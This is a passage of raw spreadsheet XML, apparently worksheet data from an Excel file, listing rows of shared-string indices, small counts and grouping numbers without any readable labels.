      <c r="B4947" t="s">
        <v>16211</v>
      </c>
      <c r="C4947">
        <v>0</v>
      </c>
      <c r="D4947">
        <v>1992</v>
      </c>
    </row>
    <row r="4948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4948" t="s">
        <v>16231</v>
      </c>
      <c r="B4948" t="s">
        <v>16212</v>
      </c>
      <c r="C4948">
        <v>0</v>
      </c>
      <c r="D4948">
        <v>1992</v>
      </c>
    </row>
    <row r="4949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4949" t="s">
        <v>16228</v>
      </c>
      <c r="B4949" t="s">
        <v>16213</v>
      </c>
      <c r="C4949">
        <v>0</v>
      </c>
      <c r="D4949">
        <v>1992</v>
      </c>
    </row>
    <row r="4950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4950" t="s">
        <v>16231</v>
      </c>
      <c r="B4950" t="s">
        <v>16214</v>
      </c>
      <c r="C4950">
        <v>0</v>
      </c>
      <c r="D4950">
        <v>1992</v>
      </c>
    </row>
    <row r="4951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4951" t="s">
        <v>16228</v>
      </c>
      <c r="B4951" t="s">
        <v>16215</v>
      </c>
      <c r="C4951">
        <v>1</v>
      </c>
      <c r="D4951">
        <v>1992</v>
      </c>
    </row>
    <row r="4952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4952" t="s">
        <v>16231</v>
      </c>
      <c r="B4952" t="s">
        <v>16216</v>
      </c>
      <c r="C4952">
        <v>1</v>
      </c>
      <c r="D4952">
        <v>1992</v>
      </c>
    </row>
    <row r="4953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4953" t="s">
        <v>16228</v>
      </c>
      <c r="B4953" t="s">
        <v>16217</v>
      </c>
      <c r="C4953">
        <v>7</v>
      </c>
      <c r="D4953">
        <v>1992</v>
      </c>
    </row>
    <row r="4954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4954" t="s">
        <v>16231</v>
      </c>
      <c r="B4954" t="s">
        <v>16218</v>
      </c>
      <c r="C4954">
        <v>0</v>
      </c>
      <c r="D4954">
        <v>1992</v>
      </c>
    </row>
    <row r="4955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4955" t="s">
        <v>16229</v>
      </c>
      <c r="B4955" t="s">
        <v>16219</v>
      </c>
      <c r="C4955">
        <v>0</v>
      </c>
      <c r="D4955">
        <v>1992</v>
      </c>
    </row>
    <row r="4956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4956" t="s">
        <v>16230</v>
      </c>
      <c r="B4956" t="s">
        <v>16220</v>
      </c>
      <c r="C4956">
        <v>0</v>
      </c>
      <c r="D4956">
        <v>1992</v>
      </c>
    </row>
    <row r="4957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4957" t="s">
        <v>16229</v>
      </c>
      <c r="B4957" t="s">
        <v>16221</v>
      </c>
      <c r="C4957">
        <v>0</v>
      </c>
      <c r="D4957">
        <v>1992</v>
      </c>
    </row>
    <row r="4958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4958" t="s">
        <v>16230</v>
      </c>
      <c r="B4958" t="s">
        <v>16222</v>
      </c>
      <c r="C4958">
        <v>0</v>
      </c>
      <c r="D4958">
        <v>1992</v>
      </c>
    </row>
    <row r="4959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4959" t="s">
        <v>16223</v>
      </c>
      <c r="B4959" t="s">
        <v>16223</v>
      </c>
      <c r="C4959">
        <v>27</v>
      </c>
      <c r="D4959">
        <v>1992</v>
      </c>
    </row>
    <row r="4960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4960" t="s">
        <v>16224</v>
      </c>
      <c r="B4960" t="s">
        <v>16224</v>
      </c>
      <c r="C4960">
        <v>1</v>
      </c>
      <c r="D4960">
        <v>1992</v>
      </c>
    </row>
    <row r="4961" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4961" t="s">
        <v>16228</v>
      </c>
      <c r="B4961" t="s">
        <v>16211</v>
      </c>
      <c r="C4961">
        <v>0</v>
      </c>
      <c r="D4961">
        <v>2734</v>
      </c>
    </row>
    <row r="4962" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4962" t="s">
        <v>16231</v>
      </c>
      <c r="B4962" t="s">
        <v>16212</v>
      </c>
      <c r="C4962">
        <v>0</v>
      </c>
      <c r="D4962">
        <v>2734</v>
      </c>
    </row>
    <row r="4963" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4963" t="s">
        <v>16228</v>
      </c>
      <c r="B4963" t="s">
        <v>16213</v>
      </c>
      <c r="C4963">
        <v>1</v>
      </c>
      <c r="D4963">
        <v>2734</v>
      </c>
    </row>
    <row r="4964" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4964" t="s">
        <v>16231</v>
      </c>
      <c r="B4964" t="s">
        <v>16214</v>
      </c>
      <c r="C4964">
        <v>1</v>
      </c>
      <c r="D4964">
        <v>2734</v>
      </c>
    </row>
    <row r="4965" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4965" t="s">
        <v>16228</v>
      </c>
      <c r="B4965" t="s">
        <v>16215</v>
      </c>
      <c r="C4965">
        <v>1</v>
      </c>
      <c r="D4965">
        <v>2734</v>
      </c>
    </row>
    <row r="4966" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4966" t="s">
        <v>16231</v>
      </c>
      <c r="B4966" t="s">
        <v>16216</v>
      </c>
      <c r="C4966">
        <v>19</v>
      </c>
      <c r="D4966">
        <v>2734</v>
      </c>
    </row>
    <row r="4967" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4967" t="s">
        <v>16228</v>
      </c>
      <c r="B4967" t="s">
        <v>16217</v>
      </c>
      <c r="C4967">
        <v>54</v>
      </c>
      <c r="D4967">
        <v>2734</v>
      </c>
    </row>
    <row r="4968" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4968" t="s">
        <v>16231</v>
      </c>
      <c r="B4968" t="s">
        <v>16218</v>
      </c>
      <c r="C4968">
        <v>32</v>
      </c>
      <c r="D4968">
        <v>2734</v>
      </c>
    </row>
    <row r="4969" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4969" t="s">
        <v>16229</v>
      </c>
      <c r="B4969" t="s">
        <v>16219</v>
      </c>
      <c r="C4969">
        <v>0</v>
      </c>
      <c r="D4969">
        <v>2734</v>
      </c>
    </row>
    <row r="4970" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4970" t="s">
        <v>16230</v>
      </c>
      <c r="B4970" t="s">
        <v>16220</v>
      </c>
      <c r="C4970">
        <v>0</v>
      </c>
      <c r="D4970">
        <v>2734</v>
      </c>
    </row>
    <row r="4971" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4971" t="s">
        <v>16229</v>
      </c>
      <c r="B4971" t="s">
        <v>16221</v>
      </c>
      <c r="C4971">
        <v>150</v>
      </c>
      <c r="D4971">
        <v>2734</v>
      </c>
    </row>
    <row r="4972" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4972" t="s">
        <v>16230</v>
      </c>
      <c r="B4972" t="s">
        <v>16222</v>
      </c>
      <c r="C4972">
        <v>200</v>
      </c>
      <c r="D4972">
        <v>2734</v>
      </c>
    </row>
    <row r="4973" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4973" t="s">
        <v>16223</v>
      </c>
      <c r="B4973" t="s">
        <v>16223</v>
      </c>
      <c r="C4973">
        <v>25</v>
      </c>
      <c r="D4973">
        <v>2734</v>
      </c>
    </row>
    <row r="4974" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4974" t="s">
        <v>16224</v>
      </c>
      <c r="B4974" t="s">
        <v>16224</v>
      </c>
      <c r="C4974">
        <v>2</v>
      </c>
      <c r="D4974">
        <v>2734</v>
      </c>
    </row>
    <row r="4975" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4975" t="s">
        <v>16228</v>
      </c>
      <c r="B4975" t="s">
        <v>16211</v>
      </c>
      <c r="C4975">
        <v>0</v>
      </c>
      <c r="D4975">
        <v>899</v>
      </c>
    </row>
    <row r="4976" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4976" t="s">
        <v>16231</v>
      </c>
      <c r="B4976" t="s">
        <v>16212</v>
      </c>
      <c r="C4976">
        <v>0</v>
      </c>
      <c r="D4976">
        <v>899</v>
      </c>
    </row>
    <row r="4977" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4977" t="s">
        <v>16228</v>
      </c>
      <c r="B4977" t="s">
        <v>16213</v>
      </c>
      <c r="C4977">
        <v>0</v>
      </c>
      <c r="D4977">
        <v>899</v>
      </c>
    </row>
    <row r="4978" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4978" t="s">
        <v>16231</v>
      </c>
      <c r="B4978" t="s">
        <v>16214</v>
      </c>
      <c r="C4978">
        <v>0</v>
      </c>
      <c r="D4978">
        <v>899</v>
      </c>
    </row>
    <row r="4979" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4979" t="s">
        <v>16228</v>
      </c>
      <c r="B4979" t="s">
        <v>16215</v>
      </c>
      <c r="C4979">
        <v>4</v>
      </c>
      <c r="D4979">
        <v>899</v>
      </c>
    </row>
    <row r="4980" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4980" t="s">
        <v>16231</v>
      </c>
      <c r="B4980" t="s">
        <v>16216</v>
      </c>
      <c r="C4980">
        <v>6</v>
      </c>
      <c r="D4980">
        <v>899</v>
      </c>
    </row>
    <row r="4981" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4981" t="s">
        <v>16228</v>
      </c>
      <c r="B4981" t="s">
        <v>16217</v>
      </c>
      <c r="C4981">
        <v>4</v>
      </c>
      <c r="D4981">
        <v>899</v>
      </c>
    </row>
    <row r="4982" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4982" t="s">
        <v>16231</v>
      </c>
      <c r="B4982" t="s">
        <v>16218</v>
      </c>
      <c r="C4982">
        <v>7</v>
      </c>
      <c r="D4982">
        <v>899</v>
      </c>
    </row>
    <row r="4983" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4983" t="s">
        <v>16229</v>
      </c>
      <c r="B4983" t="s">
        <v>16219</v>
      </c>
      <c r="C4983">
        <v>0</v>
      </c>
      <c r="D4983">
        <v>899</v>
      </c>
    </row>
    <row r="4984" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4984" t="s">
        <v>16230</v>
      </c>
      <c r="B4984" t="s">
        <v>16220</v>
      </c>
      <c r="C4984">
        <v>3</v>
      </c>
      <c r="D4984">
        <v>899</v>
      </c>
    </row>
    <row r="4985" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4985" t="s">
        <v>16229</v>
      </c>
      <c r="B4985" t="s">
        <v>16221</v>
      </c>
      <c r="C4985">
        <v>24</v>
      </c>
      <c r="D4985">
        <v>899</v>
      </c>
    </row>
    <row r="4986" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4986" t="s">
        <v>16230</v>
      </c>
      <c r="B4986" t="s">
        <v>16222</v>
      </c>
      <c r="C4986">
        <v>37</v>
      </c>
      <c r="D4986">
        <v>899</v>
      </c>
    </row>
    <row r="4987" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4987" t="s">
        <v>16223</v>
      </c>
      <c r="B4987" t="s">
        <v>16223</v>
      </c>
      <c r="C4987">
        <v>25</v>
      </c>
      <c r="D4987">
        <v>899</v>
      </c>
    </row>
    <row r="4988" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4988" t="s">
        <v>16224</v>
      </c>
      <c r="B4988" t="s">
        <v>16224</v>
      </c>
      <c r="C4988">
        <v>1</v>
      </c>
      <c r="D4988">
        <v>899</v>
      </c>
    </row>
    <row r="4989" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4989" t="s">
        <v>16228</v>
      </c>
      <c r="B4989" t="s">
        <v>16211</v>
      </c>
      <c r="C4989">
        <v>0</v>
      </c>
      <c r="D4989">
        <v>2205</v>
      </c>
    </row>
    <row r="4990" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4990" t="s">
        <v>16231</v>
      </c>
      <c r="B4990" t="s">
        <v>16212</v>
      </c>
      <c r="C4990">
        <v>0</v>
      </c>
      <c r="D4990">
        <v>2205</v>
      </c>
    </row>
    <row r="4991" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4991" t="s">
        <v>16228</v>
      </c>
      <c r="B4991" t="s">
        <v>16213</v>
      </c>
      <c r="C4991">
        <v>0</v>
      </c>
      <c r="D4991">
        <v>2205</v>
      </c>
    </row>
    <row r="4992" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4992" t="s">
        <v>16231</v>
      </c>
      <c r="B4992" t="s">
        <v>16214</v>
      </c>
      <c r="C4992">
        <v>0</v>
      </c>
      <c r="D4992">
        <v>2205</v>
      </c>
    </row>
    <row r="4993" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4993" t="s">
        <v>16228</v>
      </c>
      <c r="B4993" t="s">
        <v>16215</v>
      </c>
      <c r="C4993">
        <v>0</v>
      </c>
      <c r="D4993">
        <v>2205</v>
      </c>
    </row>
    <row r="4994" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4994" t="s">
        <v>16231</v>
      </c>
      <c r="B4994" t="s">
        <v>16216</v>
      </c>
      <c r="C4994">
        <v>0</v>
      </c>
      <c r="D4994">
        <v>2205</v>
      </c>
    </row>
    <row r="4995" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4995" t="s">
        <v>16228</v>
      </c>
      <c r="B4995" t="s">
        <v>16217</v>
      </c>
      <c r="C4995">
        <v>1</v>
      </c>
      <c r="D4995">
        <v>2205</v>
      </c>
    </row>
    <row r="4996" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4996" t="s">
        <v>16231</v>
      </c>
      <c r="B4996" t="s">
        <v>16218</v>
      </c>
      <c r="C4996">
        <v>1</v>
      </c>
      <c r="D4996">
        <v>2205</v>
      </c>
    </row>
    <row r="4997" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4997" t="s">
        <v>16229</v>
      </c>
      <c r="B4997" t="s">
        <v>16219</v>
      </c>
      <c r="C4997">
        <v>0</v>
      </c>
      <c r="D4997">
        <v>2205</v>
      </c>
    </row>
    <row r="4998" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4998" t="s">
        <v>16230</v>
      </c>
      <c r="B4998" t="s">
        <v>16220</v>
      </c>
      <c r="C4998">
        <v>0</v>
      </c>
      <c r="D4998">
        <v>2205</v>
      </c>
    </row>
    <row r="4999" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4999" t="s">
        <v>16229</v>
      </c>
      <c r="B4999" t="s">
        <v>16221</v>
      </c>
      <c r="C4999">
        <v>0</v>
      </c>
      <c r="D4999">
        <v>2205</v>
      </c>
    </row>
    <row r="5000" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5000" t="s">
        <v>16230</v>
      </c>
      <c r="B5000" t="s">
        <v>16222</v>
      </c>
      <c r="C5000">
        <v>1</v>
      </c>
      <c r="D5000">
        <v>2205</v>
      </c>
    </row>
    <row r="5001" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5001" t="s">
        <v>16223</v>
      </c>
      <c r="B5001" t="s">
        <v>16223</v>
      </c>
      <c r="C5001">
        <v>30</v>
      </c>
      <c r="D5001">
        <v>2205</v>
      </c>
    </row>
    <row r="5002" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5002" t="s">
        <v>16224</v>
      </c>
      <c r="B5002" t="s">
        <v>16224</v>
      </c>
      <c r="C5002">
        <v>0</v>
      </c>
      <c r="D5002">
        <v>2205</v>
      </c>
    </row>
    <row r="5003" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5003" t="s">
        <v>16228</v>
      </c>
      <c r="B5003" t="s">
        <v>16211</v>
      </c>
      <c r="C5003">
        <v>0</v>
      </c>
      <c r="D5003">
        <v>829</v>
      </c>
    </row>
    <row r="5004" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5004" t="s">
        <v>16231</v>
      </c>
      <c r="B5004" t="s">
        <v>16212</v>
      </c>
      <c r="C5004">
        <v>0</v>
      </c>
      <c r="D5004">
        <v>829</v>
      </c>
    </row>
    <row r="5005" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5005" t="s">
        <v>16228</v>
      </c>
      <c r="B5005" t="s">
        <v>16213</v>
      </c>
      <c r="C5005">
        <v>0</v>
      </c>
      <c r="D5005">
        <v>829</v>
      </c>
    </row>
    <row r="5006" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5006" t="s">
        <v>16231</v>
      </c>
      <c r="B5006" t="s">
        <v>16214</v>
      </c>
      <c r="C5006">
        <v>0</v>
      </c>
      <c r="D5006">
        <v>829</v>
      </c>
    </row>
    <row r="5007" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5007" t="s">
        <v>16228</v>
      </c>
      <c r="B5007" t="s">
        <v>16215</v>
      </c>
      <c r="C5007">
        <v>3</v>
      </c>
      <c r="D5007">
        <v>829</v>
      </c>
    </row>
    <row r="5008" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5008" t="s">
        <v>16231</v>
      </c>
      <c r="B5008" t="s">
        <v>16216</v>
      </c>
      <c r="C5008">
        <v>2</v>
      </c>
      <c r="D5008">
        <v>829</v>
      </c>
    </row>
    <row r="5009" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5009" t="s">
        <v>16228</v>
      </c>
      <c r="B5009" t="s">
        <v>16217</v>
      </c>
      <c r="C5009">
        <v>0</v>
      </c>
      <c r="D5009">
        <v>829</v>
      </c>
    </row>
    <row r="5010" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5010" t="s">
        <v>16231</v>
      </c>
      <c r="B5010" t="s">
        <v>16218</v>
      </c>
      <c r="C5010">
        <v>0</v>
      </c>
      <c r="D5010">
        <v>829</v>
      </c>
    </row>
    <row r="5011" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5011" t="s">
        <v>16229</v>
      </c>
      <c r="B5011" t="s">
        <v>16219</v>
      </c>
      <c r="C5011">
        <v>0</v>
      </c>
      <c r="D5011">
        <v>829</v>
      </c>
    </row>
    <row r="5012" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5012" t="s">
        <v>16230</v>
      </c>
      <c r="B5012" t="s">
        <v>16220</v>
      </c>
      <c r="C5012">
        <v>0</v>
      </c>
      <c r="D5012">
        <v>829</v>
      </c>
    </row>
    <row r="5013" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5013" t="s">
        <v>16229</v>
      </c>
      <c r="B5013" t="s">
        <v>16221</v>
      </c>
      <c r="C5013">
        <v>0</v>
      </c>
      <c r="D5013">
        <v>829</v>
      </c>
    </row>
    <row r="5014" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5014" t="s">
        <v>16230</v>
      </c>
      <c r="B5014" t="s">
        <v>16222</v>
      </c>
      <c r="C5014">
        <v>0</v>
      </c>
      <c r="D5014">
        <v>829</v>
      </c>
    </row>
    <row r="5015" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5015" t="s">
        <v>16223</v>
      </c>
      <c r="B5015" t="s">
        <v>16223</v>
      </c>
      <c r="C5015">
        <v>0</v>
      </c>
      <c r="D5015">
        <v>829</v>
      </c>
    </row>
    <row r="5016" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5016" t="s">
        <v>16224</v>
      </c>
      <c r="B5016" t="s">
        <v>16224</v>
      </c>
      <c r="C5016">
        <v>0</v>
      </c>
      <c r="D5016">
        <v>829</v>
      </c>
    </row>
    <row r="5017" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5017" t="s">
        <v>16228</v>
      </c>
      <c r="B5017" t="s">
        <v>16211</v>
      </c>
      <c r="C5017">
        <v>0</v>
      </c>
      <c r="D5017">
        <v>2690</v>
      </c>
    </row>
    <row r="5018" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5018" t="s">
        <v>16231</v>
      </c>
      <c r="B5018" t="s">
        <v>16212</v>
      </c>
      <c r="C5018">
        <v>0</v>
      </c>
      <c r="D5018">
        <v>2690</v>
      </c>
    </row>
    <row r="5019" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5019" t="s">
        <v>16228</v>
      </c>
      <c r="B5019" t="s">
        <v>16213</v>
      </c>
      <c r="C5019">
        <v>0</v>
      </c>
      <c r="D5019">
        <v>2690</v>
      </c>
    </row>
    <row r="5020" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5020" t="s">
        <v>16231</v>
      </c>
      <c r="B5020" t="s">
        <v>16214</v>
      </c>
      <c r="C5020">
        <v>0</v>
      </c>
      <c r="D5020">
        <v>2690</v>
      </c>
    </row>
    <row r="5021" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5021" t="s">
        <v>16228</v>
      </c>
      <c r="B5021" t="s">
        <v>16215</v>
      </c>
      <c r="C5021">
        <v>10</v>
      </c>
      <c r="D5021">
        <v>2690</v>
      </c>
    </row>
    <row r="5022" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5022" t="s">
        <v>16231</v>
      </c>
      <c r="B5022" t="s">
        <v>16216</v>
      </c>
      <c r="C5022">
        <v>1</v>
      </c>
      <c r="D5022">
        <v>2690</v>
      </c>
    </row>
    <row r="5023" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5023" t="s">
        <v>16228</v>
      </c>
      <c r="B5023" t="s">
        <v>16217</v>
      </c>
      <c r="C5023">
        <v>2</v>
      </c>
      <c r="D5023">
        <v>2690</v>
      </c>
    </row>
    <row r="5024" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5024" t="s">
        <v>16231</v>
      </c>
      <c r="B5024" t="s">
        <v>16218</v>
      </c>
      <c r="C5024">
        <v>0</v>
      </c>
      <c r="D5024">
        <v>2690</v>
      </c>
    </row>
    <row r="5025" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5025" t="s">
        <v>16229</v>
      </c>
      <c r="B5025" t="s">
        <v>16219</v>
      </c>
      <c r="C5025">
        <v>0</v>
      </c>
      <c r="D5025">
        <v>2690</v>
      </c>
    </row>
    <row r="5026" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5026" t="s">
        <v>16230</v>
      </c>
      <c r="B5026" t="s">
        <v>16220</v>
      </c>
      <c r="C5026">
        <v>0</v>
      </c>
      <c r="D5026">
        <v>2690</v>
      </c>
    </row>
    <row r="5027" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5027" t="s">
        <v>16229</v>
      </c>
      <c r="B5027" t="s">
        <v>16221</v>
      </c>
      <c r="C5027">
        <v>0</v>
      </c>
      <c r="D5027">
        <v>2690</v>
      </c>
    </row>
    <row r="5028" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5028" t="s">
        <v>16230</v>
      </c>
      <c r="B5028" t="s">
        <v>16222</v>
      </c>
      <c r="C5028">
        <v>0</v>
      </c>
      <c r="D5028">
        <v>2690</v>
      </c>
    </row>
    <row r="5029" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5029" t="s">
        <v>16223</v>
      </c>
      <c r="B5029" t="s">
        <v>16223</v>
      </c>
      <c r="C5029">
        <v>7</v>
      </c>
      <c r="D5029">
        <v>2690</v>
      </c>
    </row>
    <row r="5030" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5030" t="s">
        <v>16224</v>
      </c>
      <c r="B5030" t="s">
        <v>16224</v>
      </c>
      <c r="C5030">
        <v>1</v>
      </c>
      <c r="D5030">
        <v>2690</v>
      </c>
    </row>
    <row r="5031" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5031" t="s">
        <v>16228</v>
      </c>
      <c r="B5031" t="s">
        <v>16211</v>
      </c>
      <c r="C5031">
        <v>0</v>
      </c>
      <c r="D5031">
        <v>509</v>
      </c>
    </row>
    <row r="5032" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5032" t="s">
        <v>16231</v>
      </c>
      <c r="B5032" t="s">
        <v>16212</v>
      </c>
      <c r="C5032">
        <v>0</v>
      </c>
      <c r="D5032">
        <v>509</v>
      </c>
    </row>
    <row r="5033" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5033" t="s">
        <v>16228</v>
      </c>
      <c r="B5033" t="s">
        <v>16213</v>
      </c>
      <c r="C5033">
        <v>0</v>
      </c>
      <c r="D5033">
        <v>509</v>
      </c>
    </row>
    <row r="5034" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5034" t="s">
        <v>16231</v>
      </c>
      <c r="B5034" t="s">
        <v>16214</v>
      </c>
      <c r="C5034">
        <v>0</v>
      </c>
      <c r="D5034">
        <v>509</v>
      </c>
    </row>
    <row r="5035" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5035" t="s">
        <v>16228</v>
      </c>
      <c r="B5035" t="s">
        <v>16215</v>
      </c>
      <c r="C5035">
        <v>5</v>
      </c>
      <c r="D5035">
        <v>509</v>
      </c>
    </row>
    <row r="5036" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5036" t="s">
        <v>16231</v>
      </c>
      <c r="B5036" t="s">
        <v>16216</v>
      </c>
      <c r="C5036">
        <v>5</v>
      </c>
      <c r="D5036">
        <v>509</v>
      </c>
    </row>
    <row r="5037" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5037" t="s">
        <v>16228</v>
      </c>
      <c r="B5037" t="s">
        <v>16217</v>
      </c>
      <c r="C5037">
        <v>9</v>
      </c>
      <c r="D5037">
        <v>509</v>
      </c>
    </row>
    <row r="5038" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5038" t="s">
        <v>16231</v>
      </c>
      <c r="B5038" t="s">
        <v>16218</v>
      </c>
      <c r="C5038">
        <v>28</v>
      </c>
      <c r="D5038">
        <v>509</v>
      </c>
    </row>
    <row r="5039" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5039" t="s">
        <v>16229</v>
      </c>
      <c r="B5039" t="s">
        <v>16219</v>
      </c>
      <c r="C5039">
        <v>0</v>
      </c>
      <c r="D5039">
        <v>509</v>
      </c>
    </row>
    <row r="5040" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5040" t="s">
        <v>16230</v>
      </c>
      <c r="B5040" t="s">
        <v>16220</v>
      </c>
      <c r="C5040">
        <v>0</v>
      </c>
      <c r="D5040">
        <v>509</v>
      </c>
    </row>
    <row r="5041" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5041" t="s">
        <v>16229</v>
      </c>
      <c r="B5041" t="s">
        <v>16221</v>
      </c>
      <c r="C5041">
        <v>10</v>
      </c>
      <c r="D5041">
        <v>509</v>
      </c>
    </row>
    <row r="5042" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5042" t="s">
        <v>16230</v>
      </c>
      <c r="B5042" t="s">
        <v>16222</v>
      </c>
      <c r="C5042">
        <v>10</v>
      </c>
      <c r="D5042">
        <v>509</v>
      </c>
    </row>
    <row r="5043" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5043" t="s">
        <v>16223</v>
      </c>
      <c r="B5043" t="s">
        <v>16223</v>
      </c>
      <c r="C5043">
        <v>25</v>
      </c>
      <c r="D5043">
        <v>509</v>
      </c>
    </row>
    <row r="5044" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5044" t="s">
        <v>16224</v>
      </c>
      <c r="B5044" t="s">
        <v>16224</v>
      </c>
      <c r="C5044">
        <v>1</v>
      </c>
      <c r="D5044">
        <v>509</v>
      </c>
    </row>
    <row r="5045" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5045" t="s">
        <v>16228</v>
      </c>
      <c r="B5045" t="s">
        <v>16215</v>
      </c>
      <c r="C5045">
        <v>6</v>
      </c>
      <c r="D5045">
        <v>2547</v>
      </c>
    </row>
    <row r="5046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5046" t="s">
        <v>16231</v>
      </c>
      <c r="B5046" t="s">
        <v>16216</v>
      </c>
      <c r="C5046">
        <v>4</v>
      </c>
      <c r="D5046">
        <v>2547</v>
      </c>
    </row>
    <row r="5047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5047" t="s">
        <v>16228</v>
      </c>
      <c r="B5047" t="s">
        <v>16217</v>
      </c>
      <c r="C5047">
        <v>7</v>
      </c>
      <c r="D5047">
        <v>2547</v>
      </c>
    </row>
    <row r="5048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5048" t="s">
        <v>16231</v>
      </c>
      <c r="B5048" t="s">
        <v>16218</v>
      </c>
      <c r="C5048">
        <v>3</v>
      </c>
      <c r="D5048">
        <v>2547</v>
      </c>
    </row>
    <row r="5049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5049" t="s">
        <v>16229</v>
      </c>
      <c r="B5049" t="s">
        <v>16221</v>
      </c>
      <c r="C5049">
        <v>45</v>
      </c>
      <c r="D5049">
        <v>2547</v>
      </c>
    </row>
    <row r="5050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5050" t="s">
        <v>16230</v>
      </c>
      <c r="B5050" t="s">
        <v>16222</v>
      </c>
      <c r="C5050">
        <v>53</v>
      </c>
      <c r="D5050">
        <v>2547</v>
      </c>
    </row>
    <row r="5051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5051" t="s">
        <v>16228</v>
      </c>
      <c r="B5051" t="s">
        <v>16211</v>
      </c>
      <c r="C5051">
        <v>0</v>
      </c>
      <c r="D5051">
        <v>390</v>
      </c>
    </row>
    <row r="5052" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5052" t="s">
        <v>16231</v>
      </c>
      <c r="B5052" t="s">
        <v>16212</v>
